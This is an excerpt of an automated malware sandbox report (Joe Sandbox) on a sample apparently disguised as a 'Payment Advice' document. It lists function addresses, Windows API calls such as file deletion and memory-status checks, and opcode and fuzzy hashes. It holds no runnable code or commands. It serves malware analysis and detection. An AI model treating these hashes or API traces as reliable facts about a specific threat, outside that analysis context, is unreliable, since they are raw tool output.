                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 671dfdabd105f8207c2f9a66411f3f883ebea0453c06331714b4bcf3a2bf4bcb
                                                                                      • Instruction ID: a211a289f4aa02e73c5b8a7e9df05a59a321e178dd39802d8192a223168be05e
                                                                                      • Opcode Fuzzy Hash: 671dfdabd105f8207c2f9a66411f3f883ebea0453c06331714b4bcf3a2bf4bcb
                                                                                      • Instruction Fuzzy Hash: 732158B1C0065A9BCB10DFAAD4447DEFBB4FF48320F10816AD858A7251D734A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F88170 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F881E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 2263cabad00f35f96b4c94d17eaab29a7bbb406431413a5bf861386553ed6316
                                                                                      • Instruction ID: 009109a903c8a28df2dd7e0773a14d2dd2492f7f5247a05dc0f973a2f1860dda
                                                                                      • Opcode Fuzzy Hash: 2263cabad00f35f96b4c94d17eaab29a7bbb406431413a5bf861386553ed6316
                                                                                      • Instruction Fuzzy Hash: FA1133B1C0061A9BCB10DF9AD844BDEFBB4BB48320F10812AD858A7240DB38A941CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F8F0F8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F8F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: eb4d3cad0f7b4c138260f66515515749cf5fd132d9e2c088ce580f2c9acd65f1
                                                                                      • Instruction ID: 127c13eecfc0770f65bcb4d4658cff0e21c7850ac03e9f2ee7cefb1a33360ca1
                                                                                      • Opcode Fuzzy Hash: eb4d3cad0f7b4c138260f66515515749cf5fd132d9e2c088ce580f2c9acd65f1
                                                                                      • Instruction Fuzzy Hash: 461112B1C00669DFCB10DFAAD444BEEFBF4BB48320F24812AD418A7251D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F8F100 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F8F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4119231180.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_f80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 57e7a5cbec7e7dac43e9d07c018d3f51685e8ae968d758cd475b76008d5e2575
                                                                                      • Instruction ID: 8cc64744a2d770aa6b8fc35ea1e71b1dfae63ab10220be0e4334767474d1e19a
                                                                                      • Opcode Fuzzy Hash: 57e7a5cbec7e7dac43e9d07c018d3f51685e8ae968d758cd475b76008d5e2575
                                                                                      • Instruction Fuzzy Hash: 5811EFB1C00669DFCB10DFAAD944BDEFBF4AB48320F14816AD818A7251D778A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EDAF8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: e4a4ba579d53a5f360eefee4beeb62faef12c012887e96049da7ed79d4ac9711
                                                                                      • Instruction ID: 23878a812b93a49a5a935e14948564ac5c938ed0d97bd10fff33eab86cbbdcb1
                                                                                      • Opcode Fuzzy Hash: e4a4ba579d53a5f360eefee4beeb62faef12c012887e96049da7ed79d4ac9711
                                                                                      • Instruction Fuzzy Hash: DF416C31E002099FDB65DFA5C85579EBBB2BF86300F208929D505EB340EF75E94ACB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EDAE5 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: aad1dff7d5cb37dc0f001f412c4899de5b67f23abdd2bfba211425c0956a0457
                                                                                      • Instruction ID: 5d2faeb566d95055b6647a8532ae61854eef2b13e20aeedcc3bafc0ad344d1dd
                                                                                      • Opcode Fuzzy Hash: aad1dff7d5cb37dc0f001f412c4899de5b67f23abdd2bfba211425c0956a0457
                                                                                      • Instruction Fuzzy Hash: F1418B31E10209DFDB65DFA5C84569EBBB2FF86300F148929E545EB340EB71E84ACB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E21C5 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: 1b7abd340958a258b3bdbccec6c757f15064324ed144988906b4d84f55c5dda2
                                                                                      • Instruction ID: aeaf4a5ca95efb355a1977eb87705891cce498e3162d93068358d57be307a623
                                                                                      • Opcode Fuzzy Hash: 1b7abd340958a258b3bdbccec6c757f15064324ed144988906b4d84f55c5dda2
                                                                                      • Instruction Fuzzy Hash: F031DC31B002058FDB59AB74D46476EBBE6AF8A600F104429D506DB390EF36CE42CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E21D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: 8c497e7ed579d23e6ad8c8d0c86b707d2a5a373a6b2290fa9c88dc78e0e072f2
                                                                                      • Instruction ID: 7f1efa3c31465ee4e8edea411b98eec9c071b9911e63b32cfae2dfeb390ff51c
                                                                                      • Opcode Fuzzy Hash: 8c497e7ed579d23e6ad8c8d0c86b707d2a5a373a6b2290fa9c88dc78e0e072f2
                                                                                      • Instruction Fuzzy Hash: E631CF31B002058FDB49AB74D52476EBBE6BF8A200F204439D506DB394DE35DE46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E82D7 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      • Opcode ID: 27c750dd50b047803d00865192eb5b2b53be0ff2abc6da33f64b45806afb8303
                                                                                      • Instruction ID: 196b8baaed6b5fbedb1944dfe4cb6264718b1a7e0e7de832502bc5ecc4ad0e69
                                                                                      • Opcode Fuzzy Hash: 27c750dd50b047803d00865192eb5b2b53be0ff2abc6da33f64b45806afb8303
                                                                                      • Instruction Fuzzy Hash: 25F0A0BAE00218DFDF78DE90E8416ACB7B4FF42314F188462CA04E7254E331D942CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E4A71 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      • Opcode ID: c9e08876aa86e868228b47dbb1581c7ef3a7f21461d97078d0be77b5ef40a5d6
                                                                                      • Instruction ID: 316b02d4bee8acd28e545e678634826f828b5b3635f6693ff01fe9a62cd042d7
                                                                                      • Opcode Fuzzy Hash: c9e08876aa86e868228b47dbb1581c7ef3a7f21461d97078d0be77b5ef40a5d6
                                                                                      • Instruction Fuzzy Hash: F3F0FE30E50119EFDB14DF94E8597AEBBB2FF88714F208529E402B7294CB745D45CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EB240 Relevance: .3, Instructions: 294COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5b4b1bc6e5c2bce987b24e4dbb65dd25eb0eec81264e23b1debc793dc19aaa8
                                                                                      • Instruction ID: 61f589459bddf3c36840e4052cd6473f3bf212c7adde9076e9d11a4943ef1bbb
                                                                                      • Opcode Fuzzy Hash: a5b4b1bc6e5c2bce987b24e4dbb65dd25eb0eec81264e23b1debc793dc19aaa8
                                                                                      • Instruction Fuzzy Hash: 5CA1A634F102099FEF64DB6DC6947AE77E6EB8A310F204835E609E7395CA35DC818B52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E6208 Relevance: .2, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6269ae6a97d2dcf4e245471609a6e9dc0f81a0ab9dd92f1a49b592404d440785
                                                                                      • Instruction ID: 9e70d8e43361029f780c0cb21d12e0a346618e7252053f22451d7cc8679e3faa
                                                                                      • Opcode Fuzzy Hash: 6269ae6a97d2dcf4e245471609a6e9dc0f81a0ab9dd92f1a49b592404d440785
                                                                                      • Instruction Fuzzy Hash: F161F371F000114FCF509A7DC88466FEADBAFE9624B15443AD80EDB364EE65DD4287C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E42BB Relevance: .2, Instructions: 224COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4591889e3e68c46d176ced912aa5d08e85d118bdfc4701f8975401bffb1ad3c0
                                                                                      • Instruction ID: 8b8c84d364b7836262f70e2f42fc34181137bf49e2794e10257bbfcff4e2e144
                                                                                      • Opcode Fuzzy Hash: 4591889e3e68c46d176ced912aa5d08e85d118bdfc4701f8975401bffb1ad3c0
                                                                                      • Instruction Fuzzy Hash: 74814C31B102099FDF54DFA8D45066EB7F6AFCA304F248429D50AEB395EB71EC428B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E42C8 Relevance: .2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 96dca8dc3f1ada1785d30d2c6e104d67f78b23c4ed6fbdc2cddf8ef80bede729
                                                                                      • Instruction ID: 4a97acdfd36310413f9959a30a3bd2ee521e733f80d3d70a77dc6c33089caf74
                                                                                      • Opcode Fuzzy Hash: 96dca8dc3f1ada1785d30d2c6e104d67f78b23c4ed6fbdc2cddf8ef80bede729
                                                                                      • Instruction Fuzzy Hash: B2812934B102099FDF54DFA8D45466EB7F6AF8A304F208429D50AEB394EB71EC428B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E45E1 Relevance: .2, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 326f4ce56b8ae8d2ff2f3ea6ed0167b96370bec6cea05c4ac113b15594566bcf
                                                                                      • Instruction ID: dcefd5ed03e99425d6e95af8ba1aa4fecc9141696de1899189941010007c5b95
                                                                                      • Opcode Fuzzy Hash: 326f4ce56b8ae8d2ff2f3ea6ed0167b96370bec6cea05c4ac113b15594566bcf
                                                                                      • Instruction Fuzzy Hash: 8D913C30E106198BDF60DF68C880B9DB7B1FF89300F208699D54DFB255EB70AA858F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E45F0 Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd2cf86ab3101bf6a6b75c21df67a25cf3c52beaf7840d6530fb28c3453252cc
                                                                                      • Instruction ID: 230075cf8b268a3bd7909f4a9c4b16f49b1cbe8b2eb7a1949b7b05a2f578b566
                                                                                      • Opcode Fuzzy Hash: fd2cf86ab3101bf6a6b75c21df67a25cf3c52beaf7840d6530fb28c3453252cc
                                                                                      • Instruction Fuzzy Hash: 33911C34E106198BDF60DF68C880B9DB7B1FF89310F208599D54DFB255EB70AA858F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EEF40 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 46d79ca2e8b7ce645f130a9623e0d5c498217cf0e751f362fafbbe74387db193
                                                                                      • Instruction ID: e6d0f69b1bc16fcc6444c53b1ca27418efa7c810b6bec9e960b82080b09d037b
                                                                                      • Opcode Fuzzy Hash: 46d79ca2e8b7ce645f130a9623e0d5c498217cf0e751f362fafbbe74387db193
                                                                                      • Instruction Fuzzy Hash: B1715C71A002099FCB55EFA8D980AADBBF6FF85304F248469E509EB355DB30ED46CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EEF50 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ce3766925085eb16f6a9cb957ceaee642b8f6304a2ea6a5f113654b3aad0c16
                                                                                      • Instruction ID: a578c01ac31d57331a7a62355d2899b77319f793ae0d9181ed8112bb5a671a96
                                                                                      • Opcode Fuzzy Hash: 2ce3766925085eb16f6a9cb957ceaee642b8f6304a2ea6a5f113654b3aad0c16
                                                                                      • Instruction Fuzzy Hash: EF714C70A002089FDB55EFA8D980AADBBF6FF85304F248469E505EB359DB30ED46CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EFCA9 Relevance: .2, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e3dadf4c5904c42b98bad198637b479a7407cbf88a32454ba7bc00867c3ae40d
                                                                                      • Instruction ID: ac946bd128664e596ed850d63d082622db13471677bc2476e02b56a5740b1838
                                                                                      • Opcode Fuzzy Hash: e3dadf4c5904c42b98bad198637b479a7407cbf88a32454ba7bc00867c3ae40d
                                                                                      • Instruction Fuzzy Hash: C751C331F00606DFDF64AB78E4446ADBBB2FB85315F208869E206DB251DB359945CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EFA58 Relevance: .2, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2736916cfb9e20241dc59cfda5b8a4a0d1ce7885b33e91df40d982a2799c9242
                                                                                      • Instruction ID: 135626eedc48cdeea9e4687d723ce5a264d30d59d3e519d75752e4712b1ef27c
                                                                                      • Opcode Fuzzy Hash: 2736916cfb9e20241dc59cfda5b8a4a0d1ce7885b33e91df40d982a2799c9242
                                                                                      • Instruction Fuzzy Hash: BC51C830F102149FEFA4667CD95476F265ED7CA310F20482AE70ADB3A5DA7DCC459392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068EFA68 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8da3575be8cbb67f8ca8432e51aacc722cf961f0fb556bb578672982a789994e
                                                                                      • Instruction ID: 2c12e6a7009ebbad0df912b2deeac3e1e3765e58b610cf55194a875743351261
                                                                                      • Opcode Fuzzy Hash: 8da3575be8cbb67f8ca8432e51aacc722cf961f0fb556bb578672982a789994e
                                                                                      • Instruction Fuzzy Hash: 3051E630F102149FEFA4666CD99476F265ED7CA350F20482AE70ADB3E9CA7DCC459392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E5440 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30b8f288898702d2d0df8f8fe922ee3bd5b2314b804e09e1d854965264bb4c06
                                                                                      • Instruction ID: 63cbde491c79bdde1f9d519790afc649f9951e5a3889f7a613f9378b78b29e1d
                                                                                      • Opcode Fuzzy Hash: 30b8f288898702d2d0df8f8fe922ee3bd5b2314b804e09e1d854965264bb4c06
                                                                                      • Instruction Fuzzy Hash: 58415D71E006098FDF70CFA9D880AAFFBB2FB85314F10492AE216D7650D731E9558B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0601078F Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5f3f2c243532322508524c7a3864ec52e223f371e62ddaf101c3e39a14b8869
                                                                                      • Instruction ID: c6be18bf5557434e6730a7e52bf5ebc29791df7d6318d4ba91d94f7e24482c6b
                                                                                      • Opcode Fuzzy Hash: c5f3f2c243532322508524c7a3864ec52e223f371e62ddaf101c3e39a14b8869
                                                                                      • Instruction Fuzzy Hash: 29414C71E00709DBDB54DFA9C89469DBBF1EF88310F14C669E48A7B254EF70A981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E55B0 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 09b6b2b85c4c3a4667d55e0f8452f59fe7ff2b6f27cff46f67799fa705a027a6
                                                                                      • Instruction ID: 9f645b3081803d2befcb924f97a771d95992d99f7f6142f3a7b8dfb9e1dec0fd
                                                                                      • Opcode Fuzzy Hash: 09b6b2b85c4c3a4667d55e0f8452f59fe7ff2b6f27cff46f67799fa705a027a6
                                                                                      • Instruction Fuzzy Hash: 8431E670E042058FDF708F69C5C077EBBB1EB47318F61896AD25ADB252C635D941CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E2088 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 062730c3896a88e88a8e8423d1ce895517c524938ebb7f3d166544a35e04520e
                                                                                      • Instruction ID: 1fc1aa6f3d4eca0f60c50e7d30f4493ceaf6b6c14c32ded5274b304d232f62a8
                                                                                      • Opcode Fuzzy Hash: 062730c3896a88e88a8e8423d1ce895517c524938ebb7f3d166544a35e04520e
                                                                                      • Instruction Fuzzy Hash: 4A318130E102099BCF55DFA4D86469EB7B6FF8A300F148929E905EB380DB71ED42CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06010FF8 Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4168254396.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_6010000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7eb313aefa3eef4dad6a125635d75062d3052e5c8e32823aaf5a8f89fbab9ccc
                                                                                      • Instruction ID: a94cc20d155294961648b6fa490d86c6a4b7564c9f55584aa3acb0a6fddffe20
                                                                                      • Opcode Fuzzy Hash: 7eb313aefa3eef4dad6a125635d75062d3052e5c8e32823aaf5a8f89fbab9ccc
                                                                                      • Instruction Fuzzy Hash: 14318D30E002158FCB91EB68D880AAEBBF5EF89314F104529D10AEB354DB35AD068B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E3EC1 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ced51d93e3bde6f2c7cf1f4c48f7b0052026473465ab6be717f08665c2a45c4d
                                                                                      • Instruction ID: 20725dd904d941bae53c8e66ba37511bff2b7c61a3a07bb5075ed77bd8a363a5
                                                                                      • Opcode Fuzzy Hash: ced51d93e3bde6f2c7cf1f4c48f7b0052026473465ab6be717f08665c2a45c4d
                                                                                      • Instruction Fuzzy Hash: 98218E76F002159FDB44DFB9D880AAEB7F5EB88710F14802AE645E7394E774DC028B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E3ED0 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73554f6c7507d0a9f1965bc99002feff2dc1f0bb852a26d9f8d2686572274092
                                                                                      • Instruction ID: 1ce537ac60cc0820d9ed9daae72a970409d4fb49cf0f101cbe494932e817aff1
                                                                                      • Opcode Fuzzy Hash: 73554f6c7507d0a9f1965bc99002feff2dc1f0bb852a26d9f8d2686572274092
                                                                                      • Instruction Fuzzy Hash: 1821AE76F002059FDB44DF79D840AAEB7F5EB88310F10802AEA05E7384E774DC018B90
